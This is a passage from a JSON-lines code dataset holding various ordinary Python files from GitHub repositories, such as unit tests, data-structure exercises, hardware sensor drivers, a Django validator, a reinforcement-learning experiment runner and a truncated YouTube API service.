'A', 'B']:\n self.assertTrue(message in response_str and message in\n grouped_response_str, 'The diff was missing the '\n 'following message: ' + message + '. 
The diff: ' +\n response_str)\n\n def test_ignore_fields(self):\n \"\"\"The diff results page should not include any fields that were passed in\n with ignore_fields.\"\"\"\n request = {'pfif_xml_1' : PfifXml.XML_ADDED_DELETED_CHANGED_1,\n 'pfif_xml_2' : PfifXml.XML_ADDED_DELETED_CHANGED_2,\n 'options' : 'text_is_case_sensitive',\n 'ignore_fields' : 'foo bar source_date'}\n response = self.make_request(request, path='/diff/results')\n response_str = response.content\n for field in ['foo', 'bar', 'source_date']:\n self.assertFalse(field in response_str, field + ' is ignored and should '\n 'not be in the response.')\n\n def test_missing_filenames(self):\n \"\"\"The diff results page should fail gracefully when diffing a pasted in\n file, which has no filename.\"\"\"\n response = self.make_request(\n {'pfif_xml_1' : PfifXml.XML_ADDED_DELETED_CHANGED_1,\n 'pfif_xml_2' : PfifXml.XML_ADDED_DELETED_CHANGED_2},\n path='/diff/results')\n response_str = response.content\n self.assertTrue('pasted in' in response_str)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"google/personfinder","sub_path":"tools/pfif-tools/tests/test_controller.py","file_name":"test_controller.py","file_ext":"py","file_size_in_byte":7197,"program_lang":"python","lang":"en","doc_type":"code","stars":515,"dataset":"github-code","pt":"37"} +{"seq_id":"41957932341","text":"import unittest, sys\nsys.path.append('..')\nfrom deletenode import Solution, ListNode\n\nclass TestDeleteNode(unittest.TestCase):\n \n def setUp(self):\n self.s = Solution()\n \n def test_deletion(self):\n case_one = [ListNode(x) for x in [4,5,1,9]]\n for x in range(len(case_one)-1):\n case_one[x].next = case_one[x+1]\n \n # Delete node 5\n self.s.deleteNode(case_one[1])\n self.assertEqual(case_one[0].path(), [4,1,9])\n \n case_two = [ListNode(x) for x in [4,5,1,9]]\n for x in range(len(case_two)-1):\n case_two[x].next = case_two[x+1]\n \n # Attempt to delete tail (node 9)\n self.s.deleteNode(case_two[-1])\n self.assertEqual(case_two[0].path(), [4,5,1,9])\n \n \nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Hilldrupca/LeetCode","sub_path":"python/Top Interview Questions - Easy/Linked List/tests/test_deletenode.py","file_name":"test_deletenode.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"86364239428","text":"class Laptop:\n\n laptopCount = 0\n\n def __init__(self, color, screen, weight):\n self.laptopcolor = color\n self.laptopscreen = screen\n self.laptopweight = weight\n Laptop.laptopCount = Laptop.laptopCount + 1\n\n def display(self):\n print('laptop of color : ',self.laptopcolor, ',screen : ',self.laptopscreen, ',weight : ',self.laptopweight)\n if(hasattr(self,'size')):\n print('laptop size : ' , self.size)\n else:\n print(\"laptop size not defined\")\n\n def ShowLaptopCount():\n print(Laptop.laptopCount)\n\n \nlaptop1 = Laptop('red','LED',56)\nsetattr(laptop1,'size' , 15.7)\nLaptop.display(laptop1)\n\nlaptop2 = Laptop('blue','LCD',42)\nLaptop.display(laptop2)\n\nLaptop.ShowLaptopCount()\n\nprint(\"Laptop.__doc__: \", Laptop.__doc__)\nprint(\"Laptop.__dict__: \", Laptop.__dict__)\n","repo_name":"saurabhtatasteel/PythonNewDemo","sub_path":"PythonNewDemo/ClassLaptop.py","file_name":"ClassLaptop.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35957510643","text":"\"\"\"Module gathering the tests of the objects 
operators\"\"\"\n\n# pylint: disable=import-error\nimport pytest\nfrom monggregate.operators.objects import(\n MergeObjects, merge_objects,\n ObjectToArray, object_to_array\n)\n\n@pytest.mark.operators\n@pytest.mark.unit\n@pytest.mark.functional\nclass TestObjectsOperators:\n \"\"\"This class only aims at reusing the markers\"\"\"\n\n def test_merge_objects(self)->None:\n \"\"\"Tests the $mergeObjects operator\"\"\"\n\n merge_objects_op = MergeObjects(\n expression = \"$quantity\"\n )\n\n # Unit test\n # --------------\n assert merge_objects_op\n\n # Functional test\n # ---------------\n assert merge_objects_op.statement == merge_objects(\"$quantity\").statement == {\n \"$mergeObjects\" : \"$quantity\"\n }\n\n def test_object_to_array(self)->None:\n \"\"\"Tests the $objectToArray operator\"\"\"\n\n object_to_array_op = ObjectToArray(\n expression = \"$dimensions\"\n )\n\n # Unit test\n # --------------\n assert object_to_array_op\n\n # Functional test\n # ---------------\n assert object_to_array_op.statement == object_to_array(\"$dimensions\").statement == {\n \"$objectToArray\" : \"$dimensions\"\n }\n","repo_name":"VianneyMI/monggregate","sub_path":"test/test_operators_objects.py","file_name":"test_operators_objects.py","file_ext":"py","file_size_in_byte":1275,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"18887806294","text":"import math\n\nclass SkipListNode:\n def __init__(self, value = None):\n self.val = int(value)\n self.pointers = None\n self.next = None\n def appendNode(self, node):\n if hasattr(node, \"pointers\"):\n self.next = node\n else:\n raise TypeError(\"invalid node\")\n \nclass SkipList:\n def __init__(self, lst = None):\n \"\"\"\n If an initial list is provided, the skiplist will be initialized with all the elements, in order.\n \"\"\"\n self.root = None\n self.last = None\n self.length = 0\n if lst != None:\n for i in lst:\n self.append(i)\n \n def __len__(self):\n return self.length\n\n def __getitem__(self, index):\n if index >= self.length:\n raise Exception(\"Invalid index error %d, %d\" % (index, self.length))\n else:\n node = self.root\n c = 0\n while c < index:\n node = node.next\n c += 1\n return node\n \n def __getslice__(self, start, end):\n \"\"\"\n Take note that this method returns a standard python list.\n \"\"\"\n node = self[start]\n val = []\n val.append(node.val)\n while start < end:\n node = node.next\n start += 1\n val.append(node.val)\n return val\n\n def __iadd__(self, other):\n self.append(other)\n return self # in-place add must return the object, otherwise `sl += x` rebinds sl to None\n\n def __str__(self):\n return \" \".join(str(k[1]) for k in enumerate(self.get_list()))\n\n def __repr__(self):\n return str(self.get_list())\n \n def append(self, value):\n if self.root is None:\n self.root = SkipListNode(value)\n self.last = self.root\n else:\n node = SkipListNode(value)\n self.last.appendNode(node)\n self.last = node\n self.length += 1\n\n def get_list(self):\n \"\"\"\n Return a simple Python list with all the values of the skiplist.\n \"\"\"\n lst = []\n nd = self.root\n while nd != None:\n lst.append(nd.val)\n nd = nd.next\n return lst\n \n def default_skip_length(self):\n \"\"\"\n Calculates the length of the skip pointers.\n This method provides the assignment default of sqrt(list length).\n \"\"\"\n l = len(self)\n skip_length = math.floor(math.sqrt(l))\n return skip_length\n \n def gen_skips(self, skipLengthFn):\n \"\"\"\n This method generates pairs of nodes that should be joined by skip pointers.\n It takes in a helper fn that should provide the distance the skip pointers 
should be jumping over. An example of such a fn is self.default_skip_length\n \n skipLengthFn: (a:SkipList) -> int\n \"\"\"\n init = 1\n skip_length = skipLengthFn()\n l = len(self)\n target = init + skip_length\n while init < l and target < l:\n yield (init, target)\n init = target\n target = init + skip_length\n \n def create_skips(self):\n \"\"\"\n Creates the skip pointers, using the nodes provided by the gen_skips function.\n \"\"\"\n c = 1\n node = self.root\n for i,t in self.gen_skips(self.default_skip_length):\n while i > c:\n node = node.next\n c += 1\n target_node = node\n node.pointers = []\n while t > c:\n target_node = target_node.next\n c += 1\n node.pointers.append(target_node)\n node = target_node\n","repo_name":"darora/cs3245","sub_path":"ass2/skiplist.py","file_name":"skiplist.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5969463370","text":"from __future__ import division, print_function\n\n__copyright__=\"\"\"Copyright (c) 2003-2018 by The University of Queensland\nhttp://www.uq.edu.au\nPrimary Business: Queensland, Australia\"\"\"\n__license__=\"\"\"Licensed under the Apache License, version 2.0\nhttp://www.apache.org/licenses/LICENSE-2.0\"\"\"\n__url__=\"https://launchpad.net/escript-finley\"\n\n__all__ = ['Subsidence']\n\nfrom .base import ForwardModel\nfrom esys.escript import Data, FunctionOnBoundary\nfrom esys.escript.linearPDEs import LinearPDESystem\nfrom esys.escript.util import *\n\n\nclass Subsidence(ForwardModel):\n \"\"\"\n Forward Model for subsidence inversion minimizing\n integrate( (inner(w,u)-d)**2)\n where u is the surface displacement due to a pressure change P\n \"\"\"\n def __init__(self, domain, w, d, lam, mu, coordinates=None, tol=1e-8):\n \"\"\"\n Creates a new subsidence on the given domain\n\n :param domain: domain of the model\n :type domain: `Domain`\n :param w: data weighting factors and direction\n :type w: ``Vector`` with ``FunctionOnBoundary``\n :param d: displacement measured at surface\n :type d: ``Scalar`` with ``FunctionOnBoundary``\n :param lam: 1st Lame coefficient\n :type lam: ``Scalar`` with ``Function``\n :param lam: 2st Lame coefficient/Shear modulus\n :type lam: ``Scalar`` with ``Function``\n :param coordinates: defines coordinate system to be used (not supported yet))\n :type coordinates: `ReferenceSystem` or `SpatialCoordinateTransformation`\n :param tol: tolerance of underlying PDE\n :type tol: positive ``float``\n \"\"\"\n super(Subsidence, self).__init__()\n DIM=domain.getDim()\n\n self.__pde=LinearPDESystem(domain)\n self.__pde.setSymmetryOn()\n self.__pde.getSolverOptions().setTolerance(tol)\n #... 
set coefficients ...\n C=self.__pde.createCoefficient('A')\n for i in range(DIM):\n for j in range(DIM):\n C[i,i,j,j]+=lam\n C[i,j,i,j]+=mu\n C[i,j,j,i]+=mu\n x=domain.getX()\n msk=whereZero(x[DIM-1])*kronecker(DIM)[DIM-1]\n for i in range(DIM-1):\n xi=x[i]\n msk+=(whereZero(xi-inf(xi))+whereZero(xi-sup(xi))) *kronecker(DIM)[i]\n self.__pde.setValue(A=C,q=msk)\n\n self.__w=interpolate(w, FunctionOnBoundary(domain))\n self.__d=interpolate(d, FunctionOnBoundary(domain))\n\n def rescaleWeights(self, scale=1., P_scale=1.):\n \"\"\"\n rescales the weights\n \n :param scale: scale of data weighting factors\n :type scale: positive ``float``\n :param P_scale: scale of pressure increment\n :type P_scale: ``Scalar``\n \"\"\"\n pass\n\n def getArguments(self, P):\n \"\"\"\n Returns precomputed values shared by `getDefect()` and `getGradient()`.\n\n :param P: pressure\n :type P: ``Scalar``\n :return: displacement u\n :rtype: ``Vector``\n \"\"\"\n DIM=self.__pde.getDim()\n self.__pde.setValue(y=Data(),X=P*kronecker(DIM))\n u= self.__pde.getSolution()\n return u,\n\n def getDefect(self, P,u):\n \"\"\"\n Returns the value of the defect.\n\n :param P: pressure\n :type P: ``Scalar``\n :param u: corresponding displacement\n :type u: ``Vector``\n :rtype: ``float``\n \"\"\"\n return 0.5*integrate((inner(u,self.__w)-self.__d)**2)\n\n def getGradient(self, P, u):\n \"\"\"\n Returns the gradient of the defect with respect to susceptibility.\n\n :param P: pressure\n :type P: ``Scalar``\n :param u: corresponding displacement\n :type u: ``Vector``\n :rtype: ``Scalar``\n \"\"\"\n d=inner(u,self.__w)-self.__d\n self.__pde.setValue(y=d*self.__w,X=Data())\n ustar=self.__pde.getSolution()\n\n return div(ustar)\n\n","repo_name":"esys-escript/esys-escript.github.io","sub_path":"downunder/py_src/forwardmodels/subsidence.py","file_name":"subsidence.py","file_ext":"py","file_size_in_byte":3899,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"37"} +{"seq_id":"5751632455","text":"# evenements\n\ndef on_bluetooth_connected():\n basic.show_icon(IconNames.YES)\n basic.pause(100)\n basic.clear_screen()\nbluetooth.on_bluetooth_connected(on_bluetooth_connected)\n\ndef on_bluetooth_disconnected():\n basic.show_icon(IconNames.NO)\nbluetooth.on_bluetooth_disconnected(on_bluetooth_disconnected)\n\ndef on_button_pressed_a():\n bluetooth.uart_write_string(\"BtnA\\n\")\n serial.write_string(\"\" + (\"BtnA\\r\\n\"))\ninput.on_button_pressed(Button.A, on_button_pressed_a)\n\ndef on_button_pressed_b():\n bluetooth.uart_write_string(\"BtnB\\n\")\n serial.write_string(\"\" + (\"BtnB\\r\\n\"))\ninput.on_button_pressed(Button.B, on_button_pressed_b)\n\ndef on_uart_data_received():\n global s\n s = bluetooth.uart_read_until(serial.delimiters(Delimiters.NEW_LINE))\n serial.write_string(\"\" + s + serial.NEW_LINE)\n basic.show_icon(IconNames.HEART)\n basic.pause(30)\n basic.clear_screen()\nbluetooth.on_uart_data_received(serial.delimiters(Delimiters.NEW_LINE),\n on_uart_data_received)\n\ns = \"\"\ninput.set_accelerometer_range(AcceleratorRange.EIGHT_G)\nserial.redirect_to_usb()\nserial.set_baud_rate(BaudRate.BAUD_RATE115200)\nbluetooth.start_uart_service()\nbasic.show_icon(IconNames.NO)","repo_name":"mistert14-caen/ubit-ble-serial1","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12443755274","text":"import smbus2\nimport time\n\n\nclass Barometer:\n def 
__init__(self):\n # Get I2C bus\n self.bus = smbus2.SMBus(1)\n\n # MPL3115A2 address, 0x60(96)\n # Select control register, 0x26(38)\n #\t\t0xB9(185)\tActive mode, OSR = 128, Altimeter mode\n self.bus.write_byte_data(0x60, 0x26, 0xB9)\n # MPL3115A2 address, 0x60(96)\n # Select data configuration register, 0x13(19)\n #\t\t0x07(07)\tData ready event enabled for altitude, pressure, temperature\n self.bus.write_byte_data(0x60, 0x13, 0x07)\n # MPL3115A2 address, 0x60(96)\n # Select control register, 0x26(38)\n #\t\t0xB9(185)\tActive mode, OSR = 128, Altimeter mode\n self.bus.write_byte_data(0x60, 0x26, 0xB9)\n\n def getData(self):\n # MPL3115A2 address, 0x60(96)\n # Read data back from 0x00(00), 6 bytes\n # status, tHeight MSB1, tHeight MSB, tHeight LSB, temp MSB, temp LSB\n data = self.bus.read_i2c_block_data(0x60, 0x00, 6)\n\n # Convert the data to 20-bits\n tHeight = ((data[1] * 65536) + (data[2] * 256) + (data[3] & 0xF0)) / 16\n temp = ((data[4] * 256) + (data[5] & 0xF0)) / 16\n altitude = tHeight / 16.0\n cTemp = temp / 16.0\n fTemp = cTemp * 1.8 + 32\n\n return [altitude,cTemp]\n\n def getPressure(self):\n # MPL3115A2 address, 0x60(96)\n # Read data back from 0x00(00), 4 bytes\n # status, pres MSB1, pres MSB, pres LSB\n data = self.bus.read_i2c_block_data(0x60, 0x00, 4)\n\n # Convert the data to 20-bits\n pres = ((data[1] * 65536) + (data[2] * 256) + (data[3] & 0xF0)) / 16\n pressure = (pres / 4.0) / 1000.0\n\n return pressure\n","repo_name":"AyberkY/ISS-SpaceGrant18-19","sub_path":"Barometer/mpl3115a2.py","file_name":"mpl3115a2.py","file_ext":"py","file_size_in_byte":1691,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"2306342329","text":"\na=int(input(\"Enter any no\"))\nn=a # keep the original number; the loop below consumes a, so comparing a==i afterwards would always see 0\ni=0\nb=0\nwhile a>0:\n b=a%10\n i=(i*10)+b\n a=a//10\nif n==i:\n print(\"Palindrome no\")\nelse:\n print(\"not palindrome no\")\n","repo_name":"jyotirmayeemohanta/Function","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":161,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74752662826","text":"\n\n#If i want to execute 2 logics--------->means keep in 2 run()methods--->means take 2 classes\n#------>means 2 Threads\nimport threading\nclass x(threading.Thread):\n def run(self): # thread 2\n for p in range(100):\n print(p)\n\n \nclass y(threading.Thread):\n def run(self): # thread 3\n for q in range(100,200):\n print(q)\n #print(a)\n \nx1=x() #main thread\nx1.start()\ny1=y()\ny1.start()\n#x1.start() #Threads can only be started once\nfor r in range(200,300):\n print(r)\nfor s in range(300,400):\n print(s)\n\n#here total 3 threads--->1.main thread 2.'X' class thread 3. 
'Y' class thread \n\n#If multiple threads are running, if we get an error in one thread, then will it affect the other\n# thread's execution?-------->\n","repo_name":"Shashivardhan3/python","sub_path":"multithreading/84 2 run methods 2 classes.py","file_name":"84 2 run methods 2 classes.py","file_ext":"py","file_size_in_byte":794,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39483984973","text":"def minion_game(string):\n # your code goes here\n vowels = [\"A\", \"E\", \"I\", \"O\", \"U\"]\n Stuart = 0\n Kevin = 0\n for i in range(len(string)):\n if string[i] in vowels:\n Kevin += len(string) - i\n else:\n Stuart += len(string) - i\n\n if Stuart > Kevin:\n print(f\"Stuart {Stuart}\")\n elif Stuart == Kevin:\n print(\"Draw\")\n else:\n print(f\"Kevin {Kevin}\")\n\n\nif __name__ == '__main__':\n s = input()\n minion_game(s)\n","repo_name":"nhannh1526/Hackerrank-Solutions","sub_path":"Python/Strings/The Minion Game.py","file_name":"The Minion Game.py","file_ext":"py","file_size_in_byte":485,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"6300252665","text":"from django.core import checks\nfrom django.db.backends.base.validation import BaseDatabaseValidation\n\n\nclass DatabaseValidation(BaseDatabaseValidation):\n def check_field_type(self, field, field_type):\n \"\"\"Oracle doesn't support a database index on some data types.\"\"\"\n errors = []\n if field.db_index and field_type.lower() in self.connection._limited_data_types:\n errors.append(\n checks.Warning(\n \"Oracle does not support a database index on %s columns.\"\n % field_type,\n hint=(\n \"An index won't be created. Silence this warning if \"\n \"you don't care about it.\"\n ),\n obj=field,\n id=\"fields.W162\",\n )\n )\n return errors\n","repo_name":"django/django","sub_path":"django/db/backends/oracle/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":74132,"dataset":"github-code","pt":"37"} +{"seq_id":"19922654613","text":"from django.contrib import admin\nfrom django.forms import ModelForm\nfrom contracts.models import Contract\n\nfrom events.models import Event\n\n\nclass EventForm(ModelForm):\n class Meta:\n model = Event\n fields = (\n 'name',\n 'contract',\n 'support_contact',\n 'is_finished',\n 'attendees',\n 'event_date',\n 'notes'\n )\n\n def save(self, commit=True):\n event = super().save(commit=False)\n event.client = event.contract.client\n if commit:\n event.save()\n return event\n\n\n@admin.register(Event)\nclass EventAdmin(admin.ModelAdmin):\n form = EventForm\n list_display = (\n 'id',\n 'name',\n 'client',\n 'contract',\n 'support_contact',\n 'is_finished',\n 'attendees',\n 'event_date',\n 'notes'\n )\n search_fields = ('name', 'client__company_name')\n list_filter = ('contract', 'support_contact', 'is_finished')\n\n def formfield_for_foreignkey(self, db_field, request, **kwargs):\n if db_field.name == \"contract\":\n kwargs[\"queryset\"] = Contract.objects.filter(is_signed=True)\n return super().formfield_for_foreignkey(db_field, request, **kwargs)\n","repo_name":"SelHel/Implement_A_Secure_Database_With_Django_ORM_And_PostgreSQL","sub_path":"events/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74709581866","text":"\"\"\"\nAuthor: LoresDing\nVersion: v2.0.0\nDate: 
2023/03/22\nGraphics item management widget, used to display recognition sources\n\"\"\"\nimport random\nfrom settings import Settings\nfrom PySide6.QtWidgets import QGraphicsScene, QGraphicsPixmapItem, QGraphicsItem, QGraphicsPolygonItem, QStyle\nfrom PySide6.QtGui import QPixmap, QPolygon, QPen, QColor\nfrom PySide6.QtCore import QPoint\n\nclass GraphScene(QGraphicsScene):\n \"\"\"\n Image management scene\n \"\"\"\n def __init__(self):\n super().__init__()\n\nclass GraphicsPolygonItem(QGraphicsPolygonItem):\n \"\"\"\n Bounding-box graphics item\n \"\"\"\n def __init__(self, points, index, parent, window):\n super().__init__()\n # id of the recognition result\n self.index = index\n self.window = window\n self.color = random.choices(Settings.BOX_COLORS)[0]\n self.points = points\n self.setPen(QPen(QColor(*self.color), 1))\n # draw the bounding box\n self.polygon = QPolygon()\n for point in points:\n self.polygon.append(QPoint(point[0], point[1]))\n self.setPolygon(self.polygon)\n # make the item selectable\n self.setFlag(QGraphicsItem.ItemIsSelectable, True)\n parent.addItem(self)\n\n def paint(self, painter, option, widget):\n # set the selected style\n if self.isSelected():\n painter.setBrush(QColor(*self.color, 127))\n painter.setPen(QPen(QColor(*self.color), 1))\n painter.drawPolygon(self.polygon)\n # remove the default dashed selection outline\n option.state = QStyle.State_None\n self.window.ui.listWidget.setCurrentRow(self.index)\n # self.signal.emit(self.index)\n super().paint(painter, option, widget)\n \nclass GraphicsImageItem(QGraphicsPixmapItem):\n \"\"\"\n Photo image source\n \"\"\"\n def __init__(self, path, parent):\n super().__init__()\n self.pix = QPixmap(path)\n # set the pixmap\n self.setPixmap(self.pix)\n # add the item to the scene\n parent.addItem(self)","repo_name":"loresding/donkeyOCR","sub_path":"app/gui/widgets/graph_scene.py","file_name":"graph_scene.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70445970026","text":"import sys\ninput = lambda:sys.stdin.readline().rstrip()\n\ndef count_by_value(arry, x):\n n = len(arry)\n\n left_index = left(arry, x, 0, n-1)\n\n if left_index == None:\n return 0\n\n right_index = right(arry, x, 0, n-1)\n\n return right_index - left_index + 1\n\ndef left(arry, x, start, end):\n \n if start > end:\n return None\n \n mid = (start + end) // 2\n\n if (mid == 0 or x > arry[mid - 1]) and arry[mid] == x:\n return mid\n elif arry[mid] >= x:\n return left(arry, x, start, mid - 1)\n elif arry[mid] < x:\n return left(arry, x, mid + 1, end)\n\ndef right(arry, x, start, end):\n\n if start > end:\n return None\n \n mid = (start + end) // 2\n\n if (mid == n - 1 or arry[mid + 1] > x) and arry[mid] == x:\n return mid\n elif arry[mid] > x:\n return right(arry, x, start, mid - 1)\n elif arry[mid] <= x:\n return right(arry, x, mid + 1, end)\n\n\nn, x = map(int, input().split())\narry = list(map(int, input().split()))\n\ncount = count_by_value(arry, x)\n\nif count == 0:\n print(-1)\nelse:\n print(count)\n","repo_name":"kdozlo/algorithm-study-Python","sub_path":"algorithm_study/thissipython_BinarySearch/p367_1.py","file_name":"p367_1.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72379377387","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom absl import app\nfrom absl import flags\nimport pandas as pd\nfrom six.moves import range\nfrom six.moves import zip\nfrom side_effects_penalties import agent_with_penalties\nfrom side_effects_penalties import training\nfrom side_effects_penalties.file_loading 
import filename\n\n\nFLAGS = flags.FLAGS\n\nif __name__ == '__main__': # Avoid defining flags when used as a library.\n # Side effects penalty settings\n flags.DEFINE_enum('baseline', 'inaction',\n ['start', 'inaction', 'stepwise', 'step_noroll'],\n 'Baseline.')\n flags.DEFINE_enum('dev_measure', 'rel_reach',\n ['none', 'reach', 'rel_reach',\n 'uvfa_rel_reach', 'att_util'],\n 'Deviation measure.')\n flags.DEFINE_enum('dev_fun', 'truncation', ['truncation', 'absolute'],\n 'Summary function for the deviation measure.')\n flags.DEFINE_float('discount', 0.99, 'Discount factor for rewards.')\n flags.DEFINE_float('value_discount', 0.99,\n 'Discount factor for deviation measure value function.')\n flags.DEFINE_float('beta', 30.0, 'Weight for side effects penalty.')\n flags.DEFINE_string('nonterminal', 'disc',\n 'Penalty for nonterminal states relative to terminal'\n 'states: none (0), full (1), or disc (1-discount).')\n flags.DEFINE_bool('exact_baseline', False,\n 'Compute the exact baseline using an environment copy.')\n # Agent settings\n flags.DEFINE_bool('anneal', True,\n 'Whether to anneal the exploration rate from 1 to 0.')\n flags.DEFINE_integer('num_episodes', 10000, 'Number of episodes.')\n flags.DEFINE_integer('num_episodes_noexp', 0,\n 'Number of episodes with no exploration.')\n flags.DEFINE_integer('seed', 1, 'Random seed.')\n # Environment settings\n flags.DEFINE_string('env_name', 'box', 'Environment name.')\n flags.DEFINE_bool('noops', True, 'Whether the environment includes noops.')\n flags.DEFINE_integer('movement_reward', 0, 'Movement reward.')\n flags.DEFINE_integer('goal_reward', 1, 'Reward for reaching a goal state.')\n flags.DEFINE_integer('side_effect_reward', -1,\n 'Hidden reward for causing side effects.')\n # Settings for outputting results\n flags.DEFINE_enum('mode', 'save', ['print', 'save'],\n 'Print results or save to file.')\n flags.DEFINE_string('path', '', 'File path.')\n flags.DEFINE_string('suffix', '', 'Filename suffix.')\n\n\ndef run_experiment(\n baseline, dev_measure, dev_fun, discount, value_discount, beta, nonterminal,\n exact_baseline, anneal, num_episodes, num_episodes_noexp, seed,\n env_name, noops, movement_reward, goal_reward, side_effect_reward,\n mode, path, suffix):\n \"\"\"Run agent and save or print the results.\"\"\"\n performances = []\n rewards = []\n seeds = []\n episodes = []\n if 'rel_reach' not in dev_measure and 'att_util' not in dev_measure:\n dev_fun = 'none'\n nonterminal_weights = {'none': 0.0, 'disc': 1.0-discount, 'full': 1.0}\n nonterminal_weight = nonterminal_weights[nonterminal]\n reward, performance = training.run_agent(\n baseline=baseline,\n dev_measure=dev_measure,\n dev_fun=dev_fun,\n discount=discount,\n value_discount=value_discount,\n beta=beta,\n nonterminal_weight=nonterminal_weight,\n exact_baseline=exact_baseline,\n anneal=anneal,\n num_episodes=num_episodes,\n num_episodes_noexp=num_episodes_noexp,\n seed=seed,\n env_name=env_name,\n noops=noops,\n movement_reward=movement_reward,\n goal_reward=goal_reward,\n side_effect_reward=side_effect_reward,\n agent_class=agent_with_penalties.QLearningSE)\n rewards.extend(reward)\n performances.extend(performance)\n seeds.extend([seed] * (num_episodes + num_episodes_noexp))\n episodes.extend(list(range(num_episodes + num_episodes_noexp)))\n if mode == 'save':\n d = {'reward': rewards, 'performance': performances,\n 'seed': seeds, 'episode': episodes}\n df = pd.DataFrame(d)\n df1 = add_smoothed_data(df)\n f = filename(env_name, noops, dev_measure, dev_fun, baseline, beta,\n 
value_discount, path=path, suffix=suffix, seed=seed)\n df1.to_csv(f)\n return reward, performance\n\n\ndef _smooth(values, window=100):\n return values.rolling(window,).mean()\n\n\ndef add_smoothed_data(df, groupby='seed', window=100):\n grouped = df.groupby(groupby)[['reward', 'performance']]\n grouped = grouped.apply(_smooth, window=window).rename(columns={\n 'performance': 'performance_smooth', 'reward': 'reward_smooth'})\n temp = pd.concat([df, grouped], axis=1)\n return temp\n\n\ndef main(unused_argv):\n reward, performance = run_experiment(\n baseline=FLAGS.baseline,\n dev_measure=FLAGS.dev_measure,\n dev_fun=FLAGS.dev_fun,\n discount=FLAGS.discount,\n value_discount=FLAGS.value_discount,\n beta=FLAGS.beta,\n nonterminal=FLAGS.nonterminal,\n exact_baseline=FLAGS.exact_baseline,\n anneal=FLAGS.anneal,\n num_episodes=FLAGS.num_episodes,\n num_episodes_noexp=FLAGS.num_episodes_noexp,\n seed=FLAGS.seed,\n env_name=FLAGS.env_name,\n noops=FLAGS.noops,\n movement_reward=FLAGS.movement_reward,\n goal_reward=FLAGS.goal_reward,\n side_effect_reward=FLAGS.side_effect_reward,\n mode=FLAGS.mode,\n path=FLAGS.path,\n suffix=FLAGS.suffix)\n if FLAGS.mode == 'print':\n print('Performance and reward in the last 10 steps:')\n print(list(zip(performance, reward))[-10:-1])\n\n\nif __name__ == '__main__':\n app.run(main)\n","repo_name":"deepmind/deepmind-research","sub_path":"side_effects_penalties/run_experiment.py","file_name":"run_experiment.py","file_ext":"py","file_size_in_byte":5690,"program_lang":"python","lang":"en","doc_type":"code","stars":11900,"dataset":"github-code","pt":"37"} +{"seq_id":"1181344067","text":"import hydra\nfrom omegaconf import DictConfig\nfrom pytorch_lightning import Trainer, seed_everything\nfrom pytorch_lightning.callbacks import ModelCheckpoint, EarlyStopping\n\nfrom lightning_wrapper import LightningModel\n\n\n@hydra.main(config_path='conf/config.yaml')\ndef train(cfg: DictConfig):\n \"\"\"Train a pytorch model specified by the config file\"\"\"\n\n seed_everything(cfg.random_seed)\n\n model = LightningModel(cfg)\n\n train_cfg = cfg.training\n checkpoint_callback = ModelCheckpoint(save_top_k=train_cfg.save_ckpts,\n monitor=train_cfg.monitor,\n mode=train_cfg.mode)\n early_stop_callback = EarlyStopping(monitor=train_cfg.monitor,\n patience=train_cfg.patience,\n mode=train_cfg.mode)\n\n trainer = Trainer(max_epochs=train_cfg.epochs,\n gpus=cfg.gpus,\n deterministic=True,\n checkpoint_callback=checkpoint_callback,\n early_stop_callback=early_stop_callback)\n trainer.fit(model)\n\n # test best\n best = list(trainer.checkpoint_callback.best_k_models.keys())[-1]\n best_model = model.load_from_checkpoint(best)\n trainer.test(best_model)\n\n\nif __name__ == '__main__':\n train()\n","repo_name":"yolomeus/DL2020Miniproject","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21611861785","text":"from youtube.config.settings.django import YOUTUBE_SEARCH_URL\nimport json\nimport requests\nfrom videos.models import Video, APIKey\nfrom rest_framework import permissions, response, status\nimport logging\nfrom datetime import datetime\nfrom threading import Thread\nfrom videos.task import search_videos\nimport time\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger()\n\n\nclass YoutubeVideoService:\n # Method to get YouTube API key\n @classmethod\n def get_api_key(cls):\n try:\n api_key = APIKey.objects.get(in_use=True, 
